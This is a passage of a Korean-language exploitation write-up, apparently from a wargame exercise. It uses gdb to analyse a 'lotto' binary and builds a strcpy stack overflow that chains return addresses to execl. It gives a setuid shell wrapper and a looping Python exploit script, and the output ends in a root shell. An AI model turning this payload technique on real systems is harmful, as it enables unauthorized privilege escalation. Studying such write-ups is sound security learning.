0x080487f2 <main+702>:  addl   $0x1,-0x14(%ebp)
0x080487f6 <main+706>:  cmpl   $0x5,-0x14(%ebp)
0x080487fa <main+710>:  jle    0x804879f <main+619>
0x080487fc <main+712>:  jmp    0x80487ff <main+715>
0x080487fe <main+714>:  nop   
0x080487ff <main+715>:  addl   $0x1,-0x10(%ebp)
0x08048803 <main+719>:  cmpl   $0x5,-0x10(%ebp)
0x08048807 <main+723>:  jle    0x8048796 <main+610>
0x08048809 <main+725>:  mov    $0x0,%eax
0x0804880e <main+730>:  add    $0x54,%esp
0x08048811 <main+733>:  pop    %ebx
0x08048812 <main+734>:  pop    %ebp
0x08048813 <main+735>:  ret   
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x8048538
(gdb) b main+700
Breakpoint 2 at 0x80487f0
(gdb) b
main+735
Breakpoint 3 at 0x8048813
(gdb) r 1 2 3 4 5 6 AABBBB CCCC
Starting program: /root/lotto 1 2 3 4 5 6 AABBBB CCCC
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 1, 0x08048538 in main ()
(gdb) jump *main+677
Continuing at 0x80487d9.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/32wx $esp-8
0xbf92f18c:     0x4141f198      0x42424242      0xbf92f100      0xbf92fa2b
0xbf92f19c:     0xb7dfb450      0x00000009      0xbf92f224      0xbf92f24c
0xbf92f1ac:     0xb7f38b38      0x00000000      0x00000001      0x00000000
0xbf92f1bc:     0x080482d7      0xb7f2fff4      0xb7f54ce0      0x00000000
0xbf92f1cc:     0xbf92f1f8      0x67434086      0xfdc82a96      0x00000000
0xbf92f1dc:     0x00000000      0x00000000      0xb7f4cb80      0xb7dfb37d
0xbf92f1ec:     0xb7f54ff4      0x00000009      0x08048480      0x00000000
0xbf92f1fc:     0x080484a1      0x08048534      0x00000009      0xbf92f224
(gdb)
0xbf92f20c:     0x08048830      0x08048820      0xb7f47e20      0xbf92f21c
0xbf92f21c:     0xb7f523e5      0x00000009      0xbf92fa13      0xbf92fa1f
0xbf92f22c:     0xbf92fa21      0xbf92fa23      0xbf92fa25      0xbf92fa27
0xbf92f23c:     0xbf92fa29      0xbf92fa2b      0xbf92fa32      0x00000000
0xbf92f24c:     0xbf92fa37      0xbf92fa42      0xbf92fa52      0xbf92fa73
0xbf92f25c:     0xbf92fa86      0xbf92fa90      0xbf92feb9      0xbf92fec5
0xbf92f26c:     0xbf92fed9      0xbf92ff26      0xbf92ff35      0xbf92ff3f
0xbf92f27c:     0xbf92ff50      0xbf92ff59      0xbf92ff64      0xbf92ff6c
(gdb) x/32wx 0xbf92fa32
0xbf92fa32:     0x43434343      0x52455400      0x696c3d4d      0x0078756e
0xbf92fa42:     0x4c454853      0x622f3d4c      0x622f6e69      0x00687361
0xbf92fa52:     0x5f485353      0x45494c43      0x313d544e      0x312e3239
0xbf92fa62:     0x312e3836      0x312e3930      0x35323120      0x32322031
0xbf92fa72:     0x48535300      0x5954545f      0x65642f3d      0x74702f76
0xbf92fa82:     0x00312f73      0x52455355      0x6f6f723d      0x534c0074
0xbf92fa92:     0x4c4f435f      0x3d53524f      0x303d6f6e      0x69663a30
0xbf92faa2:     0x3a30303d      0x303d6964      0x34333b31      0x3d6e6c3a
(gdb) x/s 0xbf92fa32
0xbf92fa32:      "CCCC"
(gdb) x/x execl
0xb7e7b420 <execl>:     0x53565755
(gdb) disassemble main
Dump of assembler code for function main:
0x08048534 <main+0>:    push   %ebp
0x08048535 <main+1>:    mov    %esp,%ebp
0x08048537 <main+3>:    push   %ebx
0x08048538 <main+4>:    sub    $0x54,%esp
0x0804853b <main+7>:    movw   $0x0,-0x6(%ebp)
0x08048541 <main+13>:   movl   $0x0,-0x1c(%ebp)
0x08048548 <main+20>:   movl   $0x0,(%esp)
0x0804854f <main+27>:   call   0x8048450 <time@plt>
0x08048554 <main+32>:   mov    %eax,(%esp)
0x08048557 <main+35>:   call   0x80483d0 <srand@plt>
0x0804855c <main+40>:   movl   $0x0,-0x10(%ebp)
0x08048563 <main+47>:   jmp    0x80485d9 <main+165>
0x08048565 <main+49>:   call   0x8048470 <rand@plt>
0x0804856a <main+54>:   mov    %eax,%ecx
0x0804856c <main+56>:   mov    $0xb60b60b7,%edx
0x08048571 <main+61>:   mov    %ecx,%eax
0x08048573 <main+63>:   imul   %edx
0x08048575 <main+65>:   lea    (%edx,%ecx,1),%eax
0x08048578 <main+68>:   mov    %eax,%edx
0x0804857a <main+70>:   sar    $0x5,%edx
0x0804857d <main+73>:   mov    %ecx,%eax
0x0804857f <main+75>:   sar    $0x1f,%eax
0x08048582 <main+78>:   mov    %edx,%ebx
0x08048584 <main+80>:   sub    %eax,%ebx
0x08048586 <main+82>:   mov    %ebx,%eax
0x08048588 <main+84>:   imul   $0x2d,%eax,%eax
0x0804858b <main+87>:   mov    %ecx,%edx
0x0804858d <main+89>:   sub    %eax,%edx
0x0804858f <main+91>:   mov    %edx,%eax
0x08048591 <main+93>:   add    $0x1,%eax
0x08048594 <main+96>:   mov    %eax,-0x18(%ebp)
0x08048597 <main+99>:   movl   $0x0,-0x14(%ebp)
0x0804859e <main+106>:  jmp    0x80485bd <main+137>
0x080485a0 <main+108>:  mov    -0x14(%ebp),%eax
0x080485a3 <main+111>:  mov    -0x4c(%ebp,%eax,4),%eax
0x080485a7 <main+115>:  cmp    -0x18(%ebp),%eax
0x080485aa <main+118>:  jne    0x80485b9 <main+133>
0x080485ac <main+120>:  subl   $0x1,-0x10(%ebp)
0x080485b0 <main+124>:  movl   $0x0,-0x18(%ebp)
0x080485b7 <main+131>:  jmp    0x80485c5 <main+145>
0x080485b9 <main+133>:  addl   $0x1,-0x14(%ebp)
0x080485bd <main+137>:  mov    -0x14(%ebp),%eax
0x080485c0 <main+140>:  cmp    -0x10(%ebp),%eax
0x080485c3 <main+143>:  jl     0x80485a0 <main+108>
0x080485c5 <main+145>:  cmpl   $0x0,-0x18(%ebp)
0x080485c9 <main+149>:  je     0x80485d5 <main+161>
0x080485cb <main+151>:  mov    -0x10(%ebp),%eax
—Type <return> to continue, or q <return> to quit—
0x080485ce <main+154>:  mov    -0x18(%ebp),%edx
0x080485d1 <main+157>:  mov    %edx,-0x4c(%ebp,%eax,4)
0x080485d5 <main+161>:  addl   $0x1,-0x10(%ebp)
0x080485d9 <main+165>:  cmpl   $0x5,-0x10(%ebp)
0x080485dd <main+169>:  jle    0x8048565 <main+49>
0x080485df <main+171>:  mov    $0x80488e4,%eax
0x080485e4 <main+176>:  mov    %eax,(%esp)
0x080485e7 <main+179>:  call   0x8048430 <printf@plt>
0x080485ec <main+184>:  cmpl   $0x6,0x8(%ebp)
0x080485f0 <main+188>:  jg     0x8048608 <main+212>
0x080485f2 <main+190>:  movl   $0x8048913,(%esp)
0x080485f9 <main+197>:  call   0x8048460 <puts@plt>
0x080485fe <main+202>:  mov    $0x0,%eax
0x08048603 <main+207>:  jmp    0x804880e <main+730>
0x08048608 <main+212>:  movl   $0x0,-0x10(%ebp)
0x0804860f <main+219>:  jmp    0x8048700 <main+460>
0x08048614 <main+224>:  cmpl   $0x5,-0x10(%ebp)
0x08048618 <main+228>:  jne    0x80486df <main+427>
0x0804861e <main+234>:  mov    -0x10(%ebp),%eax
0x08048621 <main+237>:  add    $0x1,%eax
0x08048624 <main+240>:  shl    $0x2,%eax
0x08048627 <main+243>:  add    0xc(%ebp),%eax
0x0804862a <main+246>:  mov    (%eax),%eax
0x0804862c <main+248>:  mov    %eax,(%esp)
0x0804862f <main+251>:  call   0x8048410 <strlen@plt>
0x08048634 <main+256>:  cmp    $0x1,%eax
0x08048637 <main+259>:  jne    0x804866d <main+313>
0x08048639 <main+261>:  mov    -0x10(%ebp),%eax
0x0804863c <main+264>:  add    $0x1,%eax
0x0804863f <main+267>:  shl    $0x2,%eax
0x08048642 <main+270>:  add    0xc(%ebp),%eax
0x08048645 <main+273>:  mov    (%eax),%eax
0x08048647 <main+275>:  movl   $0x1,0x8(%esp)
0x0804864f <main+283>:  mov    %eax,0x4(%esp)
0x08048653 <main+287>:  lea    -0x6(%ebp),%eax
0x08048656 <main+290>:  mov    %eax,(%esp)
0x08048659 <main+293>:  call   0x80483f0 <strncpy@plt>
0x0804865e <main+298>:  movzbl -0x6(%ebp),%eax
0x08048662 <main+302>:  movsbl %al,%eax
0x08048665 <main+305>:  sub    $0x30,%eax
0x08048668 <main+308>:  mov    %eax,-0x18(%ebp)
0x0804866b <main+311>:  jmp    0x80486d3 <main+415>
0x0804866d <main+313>:  mov    -0x10(%ebp),%eax
0x08048670 <main+316>:  add    $0x1,%eax
0x08048673 <main+319>:  shl    $0x2,%eax
0x08048676 <main+322>:  add    0xc(%ebp),%eax
0x08048679 <main+325>:  mov    (%eax),%eax
0x0804867b <main+327>:  mov    %eax,(%esp)
—Type <return> to continue, or q <return> to quit—
0x0804867e <main+330>:  call   0x8048410 <strlen@plt>
0x08048683 <main+335>:  cmp    $0x1,%eax
0x08048686 <main+338>:  jbe    0x80486d3 <main+415>
0x08048688 <main+340>:  mov    -0x10(%ebp),%eax
0x0804868b <main+343>:  add    $0x1,%eax
0x0804868e <main+346>:  shl    $0x2,%eax
0x08048691 <main+349>:  add    0xc(%ebp),%eax
0x08048694 <main+352>:  mov    (%eax),%eax
0x08048696 <main+354>:  movl   $0x2,0x8(%esp)
0x0804869e <main+362>:  mov    %eax,0x4(%esp)
0x080486a2 <main+366>:  lea    -0x6(%ebp),%eax
0x080486a5 <main+369>:  mov    %eax,(%esp)
0x080486a8 <main+372>:  call   0x80483f0 <strncpy@plt>
0x080486ad <main+377>:  movzbl -0x6(%ebp),%eax
0x080486b1 <main+381>:  movsbl %al,%edx
0x080486b4 <main+384>:  mov    %edx,%eax
0x080486b6 <main+386>:  shl    $0x2,%eax
0x080486b9 <main+389>:  add    %edx,%eax
0x080486bb <main+391>:  add    %eax,%eax
0x080486bd <main+393>:  lea    -0x1e0(%eax),%edx
0x080486c3 <main+399>:  movzbl -0x5(%ebp),%eax
0x080486c7 <main+403>:  movsbl %al,%eax
0x080486ca <main+406>:  lea    (%edx,%eax,1),%eax
0x080486cd <main+409>:  sub    $0x30,%eax
0x080486d0 <main+412>:  mov    %eax,-0x18(%ebp)
0x080486d3 <main+415>:  mov    -0x10(%ebp),%eax
0x080486d6 <main+418>:  mov    -0x18(%ebp),%edx
0x080486d9 <main+421>:  mov    %edx,-0x34(%ebp,%eax,4)
0x080486dd <main+425>:  jmp    0x80486fc <main+456>
0x080486df <main+427>:  mov    -0x10(%ebp),%ebx
0x080486e2 <main+430>:  mov    -0x10(%ebp),%eax
0x080486e5 <main+433>:  add    $0x1,%eax
0x080486e8 <main+436>:  shl    $0x2,%eax
0x080486eb <main+439>:  add    0xc(%ebp),%eax
0x080486ee <main+442>:  mov    (%eax),%eax
0x080486f0 <main+444>:  mov    %eax,(%esp)
0x080486f3 <main+447>:  call   0x8048440 <atoi@plt>
0x080486f8 <main+452>:  mov    %eax,-0x34(%ebp,%ebx,4)
0x080486fc <main+456>:  addl   $0x1,-0x10(%ebp)
0x08048700 <main+460>:  cmpl   $0x5,-0x10(%ebp)
0x08048704 <main+464>:  jle    0x8048614 <main+224>
0x0804870a <main+470>:  mov    $0x804892d,%eax
0x0804870f <main+475>:  mov    %eax,(%esp)
0x08048712 <main+478>:  call   0x8048430 <printf@plt>
0x08048717 <main+483>:  movl   $0x0,-0x10(%ebp)
0x0804871e <main+490>:  jmp    0x804873c <main+520>
0x08048720 <main+492>:  mov    -0x10(%ebp),%eax
0x08048723 <main+495>:  mov    -0x4c(%ebp,%eax,4),%edx
—Type <return> to continue, or q <return> to quit—
0x08048727 <main+499>:  mov    $0x804893e,%eax
0x0804872c <main+504>:  mov    %edx,0x4(%esp)
0x08048730 <main+508>:  mov    %eax,(%esp)
0x08048733 <main+511>:  call   0x8048430 <printf@plt>
0x08048738 <main+516>:  addl   $0x1,-0x10(%ebp)
0x0804873c <main+520>:  cmpl   $0x5,-0x10(%ebp)
0x08048740 <main+524>:  jle    0x8048720 <main+492>
0x08048742 <main+526>:  mov    $0x8048942,%eax
0x08048747 <main+531>:  mov    %eax,(%esp)
0x0804874a <main+534>:  call   0x8048430 <printf@plt>
0x0804874f <main+539>:  movl   $0x0,-0x10(%ebp)
0x08048756 <main+546>:  jmp    0x8048774 <main+576>
0x08048758 <main+548>:  mov    -0x10(%ebp),%eax
0x0804875b <main+551>:  mov    -0x34(%ebp,%eax,4),%edx
0x0804875f <main+555>:  mov    $0x804893e,%eax
0x08048764 <main+560>:  mov    %edx,0x4(%esp)
0x08048768 <main+564>:  mov    %eax,(%esp)
0x0804876b <main+567>:  call   0x8048430 <printf@plt>
0x08048770 <main+572>:  addl   $0x1,-0x10(%ebp)
0x08048774 <main+576>:  cmpl   $0x5,-0x10(%ebp)
0x08048778 <main+580>:  jle    0x8048758 <main+548>
0x0804877a <main+582>:  movl   $0x8048954,(%esp)
0x08048781 <main+589>:  call   0x8048460 <puts@plt>
0x08048786 <main+594>:  movl   $0x0,-0x1c(%ebp)
0x0804878d <main+601>:  movl   $0x0,-0x10(%ebp)
0x08048794 <main+608>:  jmp    0x8048803 <main+719>
0x08048796 <main+610>:  movl   $0x0,-0x14(%ebp)
0x0804879d <main+617>:  jmp    0x80487f6 <main+706>
0x0804879f <main+619>:  mov    -0x10(%ebp),%eax
0x080487a2 <main+622>:  mov    -0x4c(%ebp,%eax,4),%edx
0x080487a6 <main+626>:  mov    -0x14(%ebp),%eax
0x080487a9 <main+629>:  mov    -0x34(%ebp,%eax,4),%eax
0x080487ad <main+633>:  cmp    %eax,%edx
0x080487af <main+635>:  jne    0x80487f2 <main+702>
0x080487b1 <main+637>:  addl   $0x1,-0x1c(%ebp)
0x080487b5 <main+641>:  cmpl   $0x5,-0x10(%ebp)
0x080487b9 <main+645>:  jne    0x80487f2 <main+702>
0x080487bb <main+647>:  cmpl   $0x6,-0x1c(%ebp)
0x080487bf <main+651>:  jne    0x80487f2 <main+702>
0x080487c1 <main+653>:  movl   $0x8048956,(%esp)
0x080487c8 <main+660>:  call   0x8048460 <puts@plt>
0x080487cd <main+665>:  mov    0xc(%ebp),%eax
0x080487d0 <main+668>:  add    $0x1c,%eax
0x080487d3 <main+671>:  mov    (%eax),%eax
0x080487d5 <main+673>:  test   %eax,%eax
0x080487d7 <main+675>:  je     0x80487fe <main+714>
0x080487d9 <main+677>:  mov    0xc(%ebp),%eax
0x080487dc <main+680>:  add    $0x1c,%eax
—Type <return> to continue, or q <return> to quit—
0x080487df <main+683>:  mov    (%eax),%eax
0x080487e1 <main+685>:  mov    %eax,0x4(%esp)
0x080487e5 <main+689>:  lea    -0xa(%ebp),%eax
0x080487e8 <main+692>:  mov    %eax,(%esp)
0x080487eb <main+695>:  call   0x8048420 <strcpy@plt>
0x080487f0 <main+700>:  jmp    0x80487ff <main+715>
0x080487f2 <main+702>:  addl   $0x1,-0x14(%ebp)
0x080487f6 <main+706>:  cmpl   $0x5,-0x14(%ebp)
0x080487fa <main+710>:  jle    0x804879f <main+619>
0x080487fc <main+712>:  jmp    0x80487ff <main+715>
0x080487fe <main+714>:  nop   
0x080487ff <main+715>:  addl   $0x1,-0x10(%ebp)
0x08048803 <main+719>:  cmpl   $0x5,-0x10(%ebp)
0x08048807 <main+723>:  jle    0x8048796 <main+610>
0x08048809 <main+725>:  mov    $0x0,%eax
0x0804880e <main+730>:  add    $0x54,%esp
0x08048811 <main+733>:  pop    %ebx
0x08048812 <main+734>:  pop    %ebp
0x08048813 <main+735>:  ret   
End of assembler dump.
(gdb) r 1 2 3 4 5 6 "python -c "print 'AA' + '\x13\x88\x04\x08'*43 + '\x20\xb4\xe7\xb7'"" CCCC 
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/lotto 1 2 3 4 5 6 "python -c "print 'AA' + '\x13\x88\x04\x08'*43 + '\x20\xb4\xe7\xb7'"" CCCC
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 1, 0x08048538 in main ()
(gdb) jump *main+677
Continuing at 0x80487d9.

Breakpoint 3, 0x08048813 in main ()
(gdb) x/32wx $esp
0xbfa3e9f4:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea04:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea14:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea24:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea34:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea44:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea54:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea64:     0x08048813      0x08048813      0x08048813      0x08048813
(gdb)
0xbfa3ea74:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea84:     0x08048813      0x08048813      0x08048813      0x08048813
0xbfa3ea94:     0x08048813      0x08048813      0xb7e7b420      0xbfa3f900
0xbfa3eaa4:     0xbfa3fa32      0x00000000      0xbfa3fa37      0xbfa3fa42
0xbfa3eab4:     0xbfa3fa52      0xbfa3fa73      0xbfa3fa86      0xbfa3fa90
0xbfa3eac4:     0xbfa3feb9      0xbfa3fec5      0xbfa3fed9      0xbfa3ff26
0xbfa3ead4:     0xbfa3ff35      0xbfa3ff3f      0xbfa3ff50      0xbfa3ff59
0xbfa3eae4:     0xbfa3ff64      0xbfa3ff6c      0xbfa3ff79      0xbfa3ffae
(gdb) x/s 0xbfa3fa32
0xbfa3fa32:      "CCCC"
(gdb) q
The program is running.  Exit anyway? (y or n) y
root@ubuntu:~#
[/code]

인자 구성이 다 맞아졌다. 이제 인자로 줄 shell 프로그램을 작성해 보도록 하자.
[code lang-bash]root@ubuntu:~# cat shell.c
int main()
{
        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());
        execl("/bin/sh", "sh", 0);
}root@ubuntu:~# gcc -o shell shell.c
shell.c: In function ‘main’:
shell.c:5: warning: incompatible implicit declaration of built-in function ‘execl’
shell.c:6:2: warning: no newline at end of file
root@ubuntu:~#
[/code]

shell 프로그램도 완성되었으니 이제 이전에 작성한 스크립트에 해당 코드를 넣어 공격을 해보도록 하자.
[code lang-python]#!/usr/bin/python
import os, re
p = os.popen(‘./lotto 1 2 3 4 5 6’, ‘r’, 512)
data =  p.readlines()

tmp = re.findall(‘\d+’, data[2])
number = ‘ ‘.join(tmp)

# python -c "print 'AA' + '\x13\x88\x04\x08'*43 + '\x20\x54\xef\xb7'"" ./shell; done
payload = ‘./lotto ‘ + number + ‘ "’ + ‘AA’ + ‘\x13\x88\x04\x08’*43 + ‘\x20\x54\xef\xb7’ + ‘"’ + ‘ ./shell’
os.system(payload)
[/code]

[code lang-bash]root@ubuntu:~# while true; do ./ex.py; done
This is lotto program!! Write 6 numbers.

 >> Lotto number is 4 6 36 7 38 13
Input number is 4 6 36 7 38 13

Congratulation!!
Segmentation fault
This is lotto program!! Write 6 numbers.

 >> Lotto number is 4 6 36 7 38 13
Input number is 4 6 36 7 38 13

Congratulation!!
Segmentation fault
Input number is 20 31 12 15 9 39

Congratulation!!
Segmentation fault
This is lotto program!! Write 6 numbers.

 >> Lotto number is 20 31 12 15 9 39
Input number is 20 31 12 15 9 39

Congratulation!!
Segmentation fault
This is lotto program!! Write 6 numbers.

 >> Lotto number is 20 31 12 15 9 39
Input number is 20 31 12 15 9 39

Congratulation!!
Segmentation fault
This is lotto program!! Write 6 numbers.

 >> Lotto number is 20 31 12 15 9 39
Input number is 20 31 12 15 9 39

Congratulation!!
#
[/code]

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다